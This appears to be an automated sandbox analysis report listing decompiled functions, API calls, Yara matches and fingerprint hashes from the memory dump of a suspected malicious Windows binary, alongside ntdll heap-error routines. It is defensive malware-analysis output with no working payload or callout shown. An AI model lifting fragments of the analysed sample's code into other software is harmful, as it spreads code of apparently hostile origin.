                                                                                    Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                                                                    0x0041a037
                                                                                    0x0041a03c
                                                                                    0x0041a04d
                                                                                    0x0041a051

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID: oLA
                                                                                    • API String ID: 1279760036-3789366272
                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                    • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                    • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00408374, Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 54%
                                                                                    			E00408374(void* __ebx, void* __ecx, void* __esi, void* __eflags, void* _a8, void* _a12, void* _a16, void* _a20) {
				void* _v4;
				void* _v8;
				void* _v132;
				void* _v136;
				void* _v656;
				void* _v668;
				void* _v680;
				void* _v684;
				void* _v688;
				void* _t88;
				void* _t117;
				void* _t124;
				void* _t130;

				_t117 = __esi;
				_t88 = __ebx;
				_t130 = _t124;
				if(__eflags >= 0) {
					__bl = __bl ^  *__esi;
					__ecx = __ecx + 1;
					asm("invalid");
					asm("das");
					asm("movsd");
					if (__eflags != 0) goto L1;
				}
				asm("loope 0xffffffb6");
			}
















                                                                                    0x00408374
                                                                                    0x00408374
                                                                                    0x00408374
                                                                                    0x00408375
                                                                                    0x00408377
                                                                                    0x00408379
                                                                                    0x0040837a
                                                                                    0x0040837b
                                                                                    0x0040837c
                                                                                    0x0040837d
                                                                                    0x0040837d
                                                                                    0x0040837e

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 84908e7b477e89943e4cd8cc8e9c618aaccb5be1e5dc4f97345f2ab260329285
                                                                                    • Instruction ID: 58db5ceedf706ad7a98f333962f2f3af5e984ffcdc41737a6f75857b97ff088f
                                                                                    • Opcode Fuzzy Hash: 84908e7b477e89943e4cd8cc8e9c618aaccb5be1e5dc4f97345f2ab260329285
                                                                                    • Instruction Fuzzy Hash: 8351D770A00309AFDB24DF64CD85BEB77E8EF48704F00046EF959A7281DB74A941CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004082EA, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 5f3d7a2c68cd0fae41d33208d8998b0fb62e59b8f854188e4b9519f995fcd66f
                                                                                    • Instruction ID: 4035ec81d6d796fb808d9490f8d5a673bc06e691306baa4b6c9af38d43e24a67
                                                                                    • Opcode Fuzzy Hash: 5f3d7a2c68cd0fae41d33208d8998b0fb62e59b8f854188e4b9519f995fcd66f
                                                                                    • Instruction Fuzzy Hash: D701D831A803287BE720A6958C43FFF772CAB40F54F14405EFF04BA1C1D6A9691647EA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                                                    • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                                                                    • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                                                                    • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A1B1, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: dd48b778fd5441b6342d1be205ddb8c8c38fc54b2349171efaee9387cdef2c3c
                                                                                    • Instruction ID: d45e82027b189d6e7959cee12adf31e5a57839e4a256959220b0e8b92a6e6207
                                                                                    • Opcode Fuzzy Hash: dd48b778fd5441b6342d1be205ddb8c8c38fc54b2349171efaee9387cdef2c3c
                                                                                    • Instruction Fuzzy Hash: DAF0A0B6200204AFDB10EF95CC85FEB7768FF48750F024495FA586BA02D632E855CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A052, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 5ba8c8bc5ac77fe7047b503526690ea52df20db51993c967d55430833cae097b
                                                                                    • Instruction ID: c07e63fa36b809598b1d9f61ef14f4aab930831d7f57bd2b87ab9ed59efac298
                                                                                    • Opcode Fuzzy Hash: 5ba8c8bc5ac77fe7047b503526690ea52df20db51993c967d55430833cae097b
                                                                                    • Instruction Fuzzy Hash: B1F0A0B1200100AFDB14EF29CC85EDB7BACEF48314F004158F80C8B241C230E915CAE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                    • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                    • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A092, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: 56d8e656c3be8c38c101b709c7a8066a707c6397547fc0d9f62a6c3fd3fc9e06
                                                                                    • Instruction ID: 049a3187309aeb9edca28a9ea4febb5f3ca19895e2b8bbafa10549d98800c125
                                                                                    • Opcode Fuzzy Hash: 56d8e656c3be8c38c101b709c7a8066a707c6397547fc0d9f62a6c3fd3fc9e06
                                                                                    • Instruction Fuzzy Hash: 5FE026712012146BD214CF44CD46FD33B18DF44300F018049761D6B241C138E610C796
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 80258d98bd947ca51538fa41305977987f3915d7e5b62cefa6cfc7037a825be6
                                                                                    • Instruction ID: d5bc6bcb50bb5772c930fdf6b442db1d0650c5cde8c41e6c6c63b9a57e37c390
                                                                                    • Opcode Fuzzy Hash: 80258d98bd947ca51538fa41305977987f3915d7e5b62cefa6cfc7037a825be6
                                                                                    • Instruction Fuzzy Hash: 49B09B729014C9C5E711D7B156087277A047BD0745F16C061D2024645A4778C491F6B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00A6B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 00A6B352
                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00A6B484
                                                                                    • The critical section is owned by thread %p., xrefs: 00A6B3B9
                                                                                    • The instruction at %p tried to %s , xrefs: 00A6B4B6
                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00A6B476
                                                                                    • *** enter .exr %p for the exception record, xrefs: 00A6B4F1
                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A6B3D6
                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00A6B39B
                                                                                    • The resource is owned exclusively by thread %p, xrefs: 00A6B374
                                                                                    • an invalid address, %p, xrefs: 00A6B4CF
                                                                                    • *** then kb to get the faulting stack, xrefs: 00A6B51C
                                                                                    • Go determine why that thread has not released the critical section., xrefs: 00A6B3C5
                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00A6B38F
                                                                                    • *** Inpage error in %ws:%s, xrefs: 00A6B418
                                                                                    • The instruction at %p referenced memory at %p., xrefs: 00A6B432
                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00A6B314
                                                                                    • *** enter .cxr %p for the context, xrefs: 00A6B50D
                                                                                    • The resource is owned shared by %d threads, xrefs: 00A6B37E
                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00A6B53F
                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00A6B2DC
                                                                                    • <unknown>, xrefs: 00A6B27E, 00A6B2D1, 00A6B350, 00A6B399, 00A6B417, 00A6B48E
                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 00A6B48F
                                                                                    • This failed because of error %Ix., xrefs: 00A6B446
                                                                                    • write to, xrefs: 00A6B4A6
                                                                                    • a NULL pointer, xrefs: 00A6B4E0
                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00A6B305
                                                                                    • read from, xrefs: 00A6B4AD, 00A6B4B2
                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00A6B2F3
                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00A6B47D
                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00A6B323
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                    • API String ID: 0-108210295
                                                                                    • Opcode ID: d17f83c163519e35b14983601744def1edd9cfec4e99b44b4af9d1b06f7728e5
                                                                                    • Instruction ID: ae1375760991eb5b2ef7ce141d50cd8c5b09ca41e4f0006d1117d4b8913cbc68
                                                                                    • Opcode Fuzzy Hash: d17f83c163519e35b14983601744def1edd9cfec4e99b44b4af9d1b06f7728e5
                                                                                    • Instruction Fuzzy Hash: 6E811379A51210FFDB216B158C4ADBB3B35EF87B59F400054F106ABA93D7618882DBB2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A71C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 44%
                                                                                    			E00A71C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x9948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E009BB150();
				} else {
					E009BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xaa589c);
				E009BB150("Heap error detected at %p (heap handle %p)\n",  *0xaa58a0);
				_t27 =  *0xaa5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00A71E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E009BB150();
				} else {
					E009BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E009BB150("Error code: %d - %s\n",  *0xaa5898);
				_t113 =  *0xaa58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E009BB150();
					} else {
						E009BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E009BB150("Parameter1: %p\n",  *0xaa58a4);
				}
				_t115 =  *0xaa58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E009BB150();
					} else {
						E009BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E009BB150("Parameter2: %p\n",  *0xaa58a8);
				}
				_t117 =  *0xaa58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E009BB150();
					} else {
						E009BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E009BB150("Parameter3: %p\n",  *0xaa58ac);
				}
				_t119 =  *0xaa58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E009BB150();
					} else {
						E009BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xaa58b4);
					E009BB150("Last known valid blocks: before - %p, after - %p\n",  *0xaa58b0);
				} else {
					_t120 =  *0xaa58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E009BB150();
				} else {
					E009BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E009BB150("Stack trace available at %p\n", 0xaa58c0);
			}











                                                                                    0x00a71c10
                                                                                    0x00a71c16
                                                                                    0x00a71c1e
                                                                                    0x00a71c3d
                                                                                    0x00a71c3e
                                                                                    0x00a71c20
                                                                                    0x00a71c35
                                                                                    0x00a71c3a
                                                                                    0x00a71c44
                                                                                    0x00a71c55
                                                                                    0x00a71c5a
                                                                                    0x00a71c65
                                                                                    0x00a71c67
                                                                                    0x00000000
                                                                                    0x00a71c6e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a71c67
                                                                                    0x00a71cdc
                                                                                    0x00a71ce5
                                                                                    0x00a71d04
                                                                                    0x00a71d05
                                                                                    0x00a71ce7
                                                                                    0x00a71cfc
                                                                                    0x00a71d01
                                                                                    0x00a71d0b
                                                                                    0x00a71d17
                                                                                    0x00a71d1f
                                                                                    0x00a71d25
                                                                                    0x00a71d30
                                                                                    0x00a71d4f
                                                                                    0x00a71d50
                                                                                    0x00a71d32
                                                                                    0x00a71d47
                                                                                    0x00a71d4c
                                                                                    0x00a71d61
                                                                                    0x00a71d67
                                                                                    0x00a71d68
                                                                                    0x00a71d6e
                                                                                    0x00a71d79
                                                                                    0x00a71d98
                                                                                    0x00a71d99
                                                                                    0x00a71d7b
                                                                                    0x00a71d90
                                                                                    0x00a71d95
                                                                                    0x00a71daa
                                                                                    0x00a71db0
                                                                                    0x00a71db1
                                                                                    0x00a71db7
                                                                                    0x00a71dc2
                                                                                    0x00a71de1
                                                                                    0x00a71de2
                                                                                    0x00a71dc4
                                                                                    0x00a71dd9
                                                                                    0x00a71dde
                                                                                    0x00a71df3
                                                                                    0x00a71df9
                                                                                    0x00a71dfa
                                                                                    0x00a71e00
                                                                                    0x00a71e0a
                                                                                    0x00a71e13
                                                                                    0x00a71e32
                                                                                    0x00a71e33
                                                                                    0x00a71e15
                                                                                    0x00a71e2a
                                                                                    0x00a71e2f
                                                                                    0x00a71e39
                                                                                    0x00a71e4a
                                                                                    0x00a71e02
                                                                                    0x00a71e02
                                                                                    0x00a71e08
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a71e08
                                                                                    0x00a71e5b
                                                                                    0x00a71e7a
                                                                                    0x00a71e7b
                                                                                    0x00a71e5d
                                                                                    0x00a71e72
                                                                                    0x00a71e77
                                                                                    0x00a71e95

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                    • API String ID: 0-2897834094
                                                                                    • Opcode ID: 16205dc642501d148329da5537ba323c1e7242fe8c905ce21eac612dc7bb8997
                                                                                    • Instruction ID: ce18696351c2d8f7d9f2ef879df5fcae6b63153ad35b8ab7a6c4e33a8b690a36
                                                                                    • Opcode Fuzzy Hash: 16205dc642501d148329da5537ba323c1e7242fe8c905ce21eac612dc7bb8997
                                                                                    • Instruction Fuzzy Hash: 39610332965640DFC7229BDCDD95E3073F8EB49B30B19C43AF80D6B292D7648C419A8A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009C3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 96%
                                                                                    			E009C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E009C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E009C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E009C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E009C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E009C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L009D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E009FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00A01370(_t276, 0x994e90);
							_pop(_t257);
							if(_t277 == 0) {
